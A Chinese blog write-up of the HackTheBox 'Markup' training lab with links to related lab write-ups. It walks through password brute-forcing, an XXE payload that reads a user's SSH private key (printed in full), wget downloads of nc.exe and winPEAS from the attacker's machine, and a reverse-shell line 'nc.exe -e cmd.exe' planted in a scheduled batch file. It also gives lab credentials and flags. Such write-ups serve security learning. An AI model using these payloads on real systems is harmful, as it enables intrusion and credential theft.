HTB:Markup[WriteUP]

最新推荐文章于 2024-11-09 23:33:41 发布
最新推荐文章于 2024-11-09 23:33:41 发布
阅读量1.1k 收藏 10
点赞数 27
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43007452/article/details/142792707
版权

目录

连接至HTB服务器并启动靶机

1.What version of Apache is running on the target's port 80?

2.What username:password combination logs in successfully?

使用Yakit并使用TOP1000字典对密码进行爆破

3.What is the word at the top of the page that accepts user input?

4.What XML version is used on the target?

5.What does the XXE / XEE attack acronym stand for?

6.What username can we find on the webpage's HTML code?

7.What is the file located in the Log-Management folder on the target?

Windows中SSH私钥一般都存储在用户目录下的.ssh目录中,使用以下payload

8.What executable is mentioned in the file mentioned before?

Submit user flag

USER_FLAG:032d2fc8952a8c24e39c8f0ee9918ef7

Submit root flag

在本地使用python开启http.server服务,尝试将NC、winPEAS上传至靶机

这里也可以使用winPEAS工具进行内部信息搜集

ROOT_FLAG:f574a3e7650cebd8c39784299cb570f8

连接至HTB服务器并启动靶机

靶机IP:10.129.24.29

分配IP:10.10.16.12

1.What version of Apache is running on the target's port 80?

使用nmap对靶机80端口进行服务信息扫描:

nmap -sV -p 80 {TARGET_IP}

由nmap扫描结果可见,VERSION栏目下的版本信息:2.4.41

2.What username:password combination logs in successfully?

使用浏览器对靶机80端口URL登录:http://{TARGET_IP}

使用Yakit并使用TOP1000字典对密码进行爆破

账户:admin

密码:password

所以用户名与密码组合为:admin:password

3.What is the word at the top of the page that accepts user input?

进入home.php页面:

点击顶部Order选项,此页面允许接受来自用户的输入:

4.What XML version is used on the target?

Order页面中随便填写数据,点击Submit数据上传:

使用Yakit或者BurpSuite对该数据包进行抓包:

从该请求包可以看到,靶机使用的XML版本为:1.0

5.What does the XXE / XEE attack acronym stand for?

XXE/XEE 的英文全称为 XML External Entity,即 XML 外部实体。

XXE 攻击是针对解析 XML 输入的应用程序的一种攻击方式。攻击者可以通过构造恶意的 XML 输入,利用应用程序解析 XML 时处理外部实体的机制,来读取服务器上的敏感文件、执行系统命令、进行内网探测等恶意操作。XXE 攻击的危害较大,可能导致敏感信息泄露、服务器被控制等严重后果。为了防范 XXE 攻击,可以采取禁用外部实体、对用户输入进行严格的验证和过滤等措施。

6.What username can we find on the webpage's HTML code?

services.php页面下,按Ctrl+U查看网页HTML源码:

在注释处可以看到一个用户名:Daniel

7.What is the file located in the Log-Management folder on the target?

尝试进行XXE外部实体注入攻击查找并获取Daniel的SSH私钥:

Windows中SSH私钥一般都存储在用户目录下的.ssh目录中,使用以下payload

<?xml version="1.0" ?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:c:/users/daniel/.ssh/id_rsa'>]>
<order><quantity>5</quantity><item>&test;</item><address>666</address></order>

发送请求后,获得回显:

拷贝id_rsa文件内容如下:

Your order for -----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEArJgaPRF5S49ZB+Ql8cOhnURSOZ4nVYRSnPXo6FIe9JnhVRrdEiMi
QZoKVCX6hIWp7I0BzN3o094nWInXYqh2oz5ijBqrn+NVlDYgGOtzQWLhW7MKsAvMpqM0fg
HYC5nup5qM8LYDyhLQ56j8jq5mhvEspgcDdGRy31pljOQSYDeAKVfiTOOMznyOdY/Klt6+
…-----END OPENSSH PRIVATE KEY-----
 has been processed

在本地创建一个id_rsa文件,并将内容写入:

touch id_rsa

对该私钥文件修改为600权限,使其符合SSH的保护要求: 

chmod 600 id_rsa

将秘钥内容写入:

echo "-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----">id_rsa

使用SSH连接至靶机daniel用户:

ssh -i id_rsa daniel@{TARGET_IP}

在C盘根目录下,找到了Log_Management文件夹:

列出该文件夹内所有文件:

dir C:\Log-Management

可见该文件夹内仅存在一个:job.bat文件

8.What executable is mentioned in the file mentioned before?

进入C:\Log-Management目录中,并使用type命令查看job.bat文件内容:

cd C:\Log-Management
type job.bat

可见在该bat文件中,运行了wevtutil.exe文件

Submit user flag

在daniel用户的桌面上可以找到flag.txt文件,查看其内容:

USER_FLAG:032d2fc8952a8c24e39c8f0ee9918ef7

Submit root flag

使用icacls命令查看job.bat文件权限设置:

通过输出结果可见,BUILTIN为所有本地用户,具备完全控制权限(F)

这意味着我们对该文件可以随意读写

在本地使用python开启http.server服务,尝试将NC、winPEAS上传至靶机

在靶机启动powershell,并使用wget命令将本地文件下载至靶机:

wget http://{NATIVE_IP}:6666/nc.exe -outfile nc.exe
wget http://{NATIVE_IP}:6666/winPEASx64.exe -outfile winPEASx64.exe

将nc反弹shell命令写入job.nat文件中:

echo C:\Log-Management\nc.exe -e cmd.exe {NATIVE_IP} {NATIVE_PORT} > job.bat

在本地启用nc监听:

nc -lvnp {NATIVE_PORT}

因为job.bat文件在靶机系统将计划执行,所以只需要一直等(可能有点久)就会有反弹shell

不知道什么原因job.bat文件的内容一直被覆写,所以nc反弹shell这里可能需要多尝试几次

这里也可以使用winPEAS工具进行内部信息搜集

.\winPEASx64.exe

直接可以拿到管理用用户凭证:

账户:Administrator

密码:Yhk}QE&j<3M

直接使用该账户密码进行SSH服务登录:

ssh Administrator@{TARGET_IP}

也是顺利拿到了管理员权限,接下来也是在Administrator用户桌面下找到了root.txt

ROOT_FLAG:f574a3e7650cebd8c39784299cb570f8

HackTheBox-Starting Point--Tier 2---Markup
七天
11-17 339
从输出可以看出,组BUTLTIN\Users 对 bat.job 文件具有完全控制权限,BUILTIN\Users 组表示所有本地用户,肯定也就包含 Daniel 用户。我们对该二进制文件job.bat具有完全访问权限,这意味着我们可以修改job.bat文件并插入任何我们构造好的payload。如何wevtutil.exe进程正在运行的话,我门就可以利用job.bat进行计划任务反弹shell了。但是job.bat只能由管理员用户执行,目前是Daniel用户权限,无法利用。1.在网页源代码中,发现存在。
HTB:Three[WriteUP]
如有错误感谢斧正
09-29 1087
通过存储桶中的对象,我们可以看到index.php文件,所以可以确定该Web脚本语言为。接着在shell.sh同目录下启动http.server服务,随便选择开启一个闲置端口。在靶机Webshell中,通过curl访问本地shell.sh文件进行反弹shell。使用ls命令逐级查找flag的位置,最终在上一级目录找到了flag.txt。本地写一个shell.sh文件来获得一个反弹shell,再使用nc持续监听。考虑到该服务使用PHP进行编写,并且允许我们对该桶进行增删改查。
HTB:Granny[WriteUP]
如有错误感谢斧正
10-29 1277
PS:这里我用这个EXP也是一直不成功,期间也更换了几个EXP又将代码进行了修改,还是无法成功利用,最终在重置了HTB靶机后成功getshell,也就是说上面的MSF理论上来说也是可用的...经过反复的测试,该模块始终无法正常回弹Shell,所以我们到GITHUB找EXP。由上文扫描可知靶机中间件使用IIS 6.0,结合WebDAV服务搜索漏洞。PS:到文件下载这一步,靶机又卡死了好几次,这个机子真的很不稳定SOS。通过上文nmap扫描结果可见,靶机使用了WebDAV服务。
HTB:Blue[WriteUP]
如有错误感谢斧正
10-11 722
受影响的操作系统包括各种版本,如 Windows Vista、Windows Server 2008、Windows 7 和 Windows 8 等。由输出结果可见,靶机启用共享:ADMIN$、C$、IPC$、Share、Users。由fscan扫描结果可见,靶机开放端口:135、139、445 共。由扫描结果可见,靶机极有可能存在MS17-010漏洞。使用use命令直接使用该eternalblue模块。靶机IP:10.10.10.40。将靶机IP填入RHOSTS选项中。将靶机IP填入RHOSTS选项中。
HTB:Blocky[WriteUP]
如有错误感谢斧正
10-25 929
接着使用dirbuster、dirsearch、ffuf、wfuzz等工具对靶机路径进行爆破。直接访问会显示链接已被重置,所以我们将IP和域名写入hosts文件使DNS本地解析。从扫描结果可见靶机应该是Ubuntu_Linux系统,对各服务版本进行漏洞扫描。发现所有文件都可以特权运行,那就直接将shell切换到root用户即可。可以看到基本是什么文件复制洞,尝试匿名登录一下靶机FTP服务器。可以确定该用户就是数据库管理者,尝试通过SSH服务同密码登录。靶机开放端口:21、22、80、25565。
HTB:Unified[WriteUP]
如有错误感谢斧正
10-03 1235
注:刚开始我弹shell一直不成功,如果你也有同样的问题,检查--command后代码的空格。(轻量级目录访问协议,可构造恶意数据让应用连接攻击者控制的服务器执行远程代码)(远程方法调用协议,攻击者创建恶意服务器注册远程对象让应用获取执行恶意代码)SHA-512这种类型的哈希值是不太可能爆破的出来的。可以看到CVE-2021-44530可以影响到。另起一终端,使用tcpdump抓取本地。
HTB:Sightless[WriteUP]
如有错误感谢斧正
11-09 1155
PHP - FPM是一种基于FastCGI协议的PHP进程管理器,它负责启动、管理PHP进程,根据服务器负载动态调整进程数量,接收Web服务器的PHP请求,有效处理并返回结果,能提高性能、优化内存管理、增强系统稳定性且具有配置灵活性。这里重点是michael用户的密码,但也先暂时也记一下root用户哈希密码没准后续能用上。提示没有权限,果然是不出我所料甚至连user_flag都没有权限查看。接下来,我用弱口令字典跑了ROOT用户的哈希值差不多三分钟。使用michael用户凭证,通过SSH服务登录靶机
HTB:Cap[WriteUP]
如有错误感谢斧正
10-12 1050
往下拉可以看到,除了我们本机IP(10.10.16.7),还存在IP:1.1.1.1扫描:(由fscan、nmap扫描结果可见,靶机开放端口:21、22、80 共。因为靶机已开启22端口SSH服务,所以我们尝试FTP凭证对。使用Wireshark打开该pcap文件,可以在。使用浏览器访问靶机URL,在左侧可以找到。密码:Buck3tH4TF0RM3!靶机IP:10.10.10.245。将URL中data后面的数字修改成。将当前进程的用户设置为root用户。分配IP:10.10.16.7。
HTB:Chemistry[WriteUP]
如有错误感谢斧正
11-09 916
发现64457无法访问,回头看原来在端口扫描的时候显示的就是closed了。这里就直接让我们上传CIF文件了,直接到往上搜索该文件有没有什么RCE漏洞。可以看到靶机本地8080端口存在一个服务,尝试通过SSH映射到本地。点击右侧的注册按钮进行注册后,即可直接登录进入面板中。22端口托管SSH服务,所以这里重点关注。本地新建一个文件key,存放该rsa秘钥。将该秘钥文件赋权,使其满足SSH安全需求。使用该ROOT用户秘钥登录靶机SSH服务。由输出可以基本确定,该Web服务(靶机IP:10.10.11.38。
HackTheBox(HTB) Bagel WriteUp
qq_58869808的博客
02-20 1623
HackTheBox bagel 靶机 通过writeup
vagrant-htb:HackTheBox的Vagrantfile
03-01
流浪汉 Kali流浪者设置(最低) 安装工具 vim 网络工具 python3 解压缩 多路复用器 纳帕 网页壳 ...如果要添加更多,只需编辑Provision / kali.yml文件。...再一次,g,如果您想添加更多,只需将git repo...cd vagrant-htb
HTB Jupiter靶机 WriteUp
qq_58869808的博客
06-06 3790
Hackthebox Jupiter靶机
HTB:堡垒系列-jet.com
m0_46391769的博客
11-01 7252
HTB:jet.com练习 信息收集 首先masscan: Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-10-31 08:05:08 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [65535 ports/host] Discovered open port 80
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8544
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
AI企联系统 Ai企业级系统开心版 uniapp适配 Web+H5+微信小程序+抖音小程序+双端APP
11-12
AI企联系统 Ai企业级系统开心版 uniapp适配 Web+H5+微信小程序+抖音小程序+双端APP 一款市面上新出的AI企联系统,项目uniapp开发的,支持3.5 4.0 Mj,此套系统5端适配,Web+H5+微信小程序+抖音小程序+双端APP,支持流量主! 自己有能力的可以二开,UI后台也可以自己改。
2000d.doc
11-12
2000d
通过SpringCloud实现微服务:Eureka+Ribbon+Feign+Zuul.zip
最新发布
11-12
根据书籍《Java微服务架构实践》提供源码,通过SpringCloud实现微服务:Eureka+Ribbon+Feign+Zuul
基于CNN-BiLSTM-Adaboost的自行车租赁数量预测研究附Matlab代码.rar
11-12
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
HTB 2021:简化内部应用注册流程的工具
本文件描述了一个名为“htb21-reg:htb 2021注册引擎”的工具,它是一个演示应用程序,用以简化Compsoc委员会成员通过现有Google Admin平台登录内部应用程序的过程。该工具的设计初衷在于减轻管理员对于新应用程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0DayHP

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值